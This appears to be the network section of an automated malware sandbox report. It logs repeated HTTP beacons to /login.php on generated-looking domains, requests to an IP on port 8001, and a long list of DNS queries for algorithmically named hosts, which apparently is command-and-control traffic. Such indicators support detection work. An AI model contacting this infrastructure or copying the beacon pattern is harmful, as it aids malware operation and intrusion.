Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?subid1=20240824-0243-071d-8c4b-3f42cf5256c3 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1724431387.5010053Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?sub1=20240824-0243-077d-8f61-d4c58a818681 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1724431387.3029143Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comContent-Length: 6Cookie: btst=ba785a403bc90255316f056071bf01aa\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comContent-Length: 6Cookie: btst=aa184787ed2d77e1f6f59c2dc950863e\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comContent-Length: 6Cookie: vsid=918vr471976932991951418Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comContent-Length: 6Cookie: btst=a03933307436d0e87a275c8dab3cea9f\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comContent-Length: 6Cookie: btst=3bd5de231d5c30f08e390492f5c039b1\|8.46.123.33\|1724431332\|1724431332\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comContent-Length: 6Cookie: sid=a5fae49c-616e-11ef-add0-e1f04491a098Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww6.galyqaz.comConnection: Keep-AliveCookie: vsid=918vr471976932991951418Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.comContent-Length: 6Cookie: btst=2defa10e06435b44928a9b853377cfec\|8.46.123.33\|1724431347\|1724431347\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /dh/147287063_637385.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.137.66:8001Connection: Keep-AliveData Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.comContent-Length: 6Cookie: btst=d106e65ece3c227125fd2b7f88318a22\|8.46.123.33\|1724431386\|1724431386\|0\|1\|0; snkz=8.46.123.33Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comContent-Length: 6Cookie: __tad=1724431387.3029143Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comContent-Length: 6Cookie: __tad=1724431387.5010053Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.comContent-Length: 6Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?sub1=20240824-0244-0577-915a-f20bc3a7af60 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1724431387.3029143Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Source: global traffic	HTTP traffic detected: GET /login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcb HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1724431387.5010053Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Source: global traffic	DNS traffic detected: DNS query: gatyfus.com
Source: global traffic	DNS traffic detected: DNS query: lyvyxor.com
Source: global traffic	DNS traffic detected: DNS query: puvyxil.com
Source: global traffic	DNS traffic detected: DNS query: qetyfuv.com
Source: global traffic	DNS traffic detected: DNS query: gahyqah.com
Source: global traffic	DNS traffic detected: DNS query: lyryfyd.com
Source: global traffic	DNS traffic detected: DNS query: vocyzit.com
Source: global traffic	DNS traffic detected: DNS query: qegyqaq.com
Source: global traffic	DNS traffic detected: DNS query: vojyqem.com
Source: global traffic	DNS traffic detected: DNS query: purydyv.com
Source: global traffic	DNS traffic detected: DNS query: gacyzuz.com
Source: global traffic	DNS traffic detected: DNS query: lygymoj.com
Source: global traffic	DNS traffic detected: DNS query: vowydef.com
Source: global traffic	DNS traffic detected: DNS query: qexylup.com
Source: global traffic	DNS traffic detected: DNS query: pufymoq.com
Source: global traffic	DNS traffic detected: DNS query: gaqydeb.com
Source: global traffic	DNS traffic detected: DNS query: lyxylux.com
Source: global traffic	DNS traffic detected: DNS query: vofymik.com
Source: global traffic	DNS traffic detected: DNS query: qeqysag.com
Source: global traffic	DNS traffic detected: DNS query: puzylyp.com
Source: global traffic	DNS traffic detected: DNS query: gadyniw.com
Source: global traffic	DNS traffic detected: DNS query: lymysan.com
Source: global traffic	DNS traffic detected: DNS query: volykyc.com
Source: global traffic	DNS traffic detected: DNS query: qedynul.com
Source: global traffic	DNS traffic detected: DNS query: pumypog.com
Source: global traffic	DNS traffic detected: DNS query: galykes.com
Source: global traffic	DNS traffic detected: DNS query: lysynur.com
Source: global traffic	DNS traffic detected: DNS query: vonypom.com
Source: global traffic	DNS traffic detected: DNS query: qekykev.com
Source: global traffic	DNS traffic detected: DNS query: pupybul.com
Source: global traffic	DNS traffic detected: DNS query: lykyjad.com
Source: global traffic	DNS traffic detected: DNS query: vopybyt.com
Source: global traffic	DNS traffic detected: DNS query: pujyjav.com
Source: global traffic	DNS traffic detected: DNS query: gatyvyz.com
Source: global traffic	DNS traffic detected: DNS query: ganypih.com
Source: global traffic	DNS traffic detected: DNS query: lyvytuj.com
Source: global traffic	DNS traffic detected: DNS query: vojyjof.com
Source: global traffic	DNS traffic detected: DNS query: qetyvep.com
Source: global traffic	DNS traffic detected: DNS query: puvytuq.com
Source: global traffic	DNS traffic detected: DNS query: gahyhob.com
Source: global traffic	DNS traffic detected: DNS query: lyryvex.com
Source: global traffic	DNS traffic detected: DNS query: vocyruk.com
Source: global traffic	DNS traffic detected: DNS query: qebytiq.com
Source: global traffic	DNS traffic detected: DNS query: qegyhig.com
Source: global traffic	DNS traffic detected: DNS query: purycap.com
Source: global traffic	DNS traffic detected: DNS query: gacyryw.com
Source: global traffic	DNS traffic detected: DNS query: lygygin.com
Source: global traffic	DNS traffic detected: DNS query: qexyryl.com
Source: global traffic	DNS traffic detected: DNS query: pufygug.com
Source: global traffic	DNS traffic detected: DNS query: gaqycos.com
Source: global traffic	DNS traffic detected: DNS query: lyxywer.com
Source: global traffic	DNS traffic detected: DNS query: vofygum.com
Source: global traffic	DNS traffic detected: DNS query: qeqyxov.com
Source: global traffic	DNS traffic detected: DNS query: gadyfuh.com
Source: global traffic	DNS traffic detected: DNS query: puzywel.com
Source: global traffic	DNS traffic detected: DNS query: lymyxid.com
Source: global traffic	DNS traffic detected: DNS query: volyqat.com
Source: global traffic	DNS traffic detected: DNS query: qedyfyq.com
Source: global traffic	DNS traffic detected: DNS query: vowycac.com
Source: global traffic	DNS traffic detected: DNS query: galyqaz.com
Source: global traffic	DNS traffic detected: DNS query: pumyxiv.com
Source: global traffic	DNS traffic detected: DNS query: lysyfyj.com
Source: global traffic	DNS traffic detected: DNS query: vonyzuf.com
Source: global traffic	DNS traffic detected: DNS query: qekyqop.com
Source: global traffic	DNS traffic detected: DNS query: www.gahyqah.com
Source: global traffic	DNS traffic detected: DNS query: ww1.lysyfyj.com
Source: global traffic	DNS traffic detected: DNS query: ganyzub.com
Source: global traffic	DNS traffic detected: DNS query: pupydeq.com
Source: global traffic	DNS traffic detected: DNS query: lykymox.com
Source: global traffic	DNS traffic detected: DNS query: vopydek.com
Source: global traffic	DNS traffic detected: DNS query: qebylug.com
Source: global traffic	DNS traffic detected: DNS query: pujymip.com
Source: global traffic	DNS traffic detected: DNS query: lyvylyn.com
Source: global traffic	DNS traffic detected: DNS query: gatydaw.com
Source: global traffic	DNS traffic detected: DNS query: vojymic.com
Source: global traffic	DNS traffic detected: DNS query: qetysal.com
Source: global traffic	DNS traffic detected: DNS query: puvylyg.com
Source: global traffic	DNS traffic detected: DNS query: gahynus.com
Source: global traffic	DNS traffic detected: DNS query: lyrysor.com
Source: global traffic	DNS traffic detected: DNS query: vocykem.com
Source: global traffic	DNS traffic detected: DNS query: purypol.com
Source: global traffic	DNS traffic detected: DNS query: qegynuv.com
Source: global traffic	DNS traffic detected: DNS query: gacykeh.com
Source: global traffic	DNS traffic detected: DNS query: lygynud.com
Source: global traffic	DNS traffic detected: DNS query: vowypit.com
Source: global traffic	DNS traffic detected: DNS query: qexykaq.com
Source: global traffic	DNS traffic detected: DNS query: gaqypiz.com
Source: global traffic	DNS traffic detected: DNS query: lyxyjaj.com
Source: global traffic	DNS traffic detected: DNS query: pufybyv.com
Source: global traffic	DNS traffic detected: DNS query: vofybyf.com
Source: global traffic	DNS traffic detected: DNS query: qeqytup.com
Source: global traffic	DNS traffic detected: DNS query: puzyjoq.com
